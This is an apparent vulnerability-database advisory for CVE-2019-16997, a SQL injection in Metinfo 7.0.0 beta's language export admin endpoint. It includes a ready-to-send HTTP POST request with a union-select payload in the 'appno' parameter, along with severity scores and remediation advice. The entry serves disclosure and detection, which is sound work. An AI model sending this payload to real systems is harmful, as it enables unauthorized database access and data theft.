🔙 목록으로 돌아가기

CVE-2019-16997: Metinfo 7.0.0 beta - SQL Injection

TitleMetinfo 7.0.0 beta - SQL Injection
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationUpgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability.
CVSS Score7.2
EPSS Score0.93646
CVE IDCVE-2019-16997
CWE IDCWE-89
Tags cve cve2019 metinfo sqli vuln

🔍 Vulnerability Description

Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter.

🌐 HTTP Request

POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

appno= 1 union SELECT 98989*443131,1&editor=cn&site=web

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16997.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-16997.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A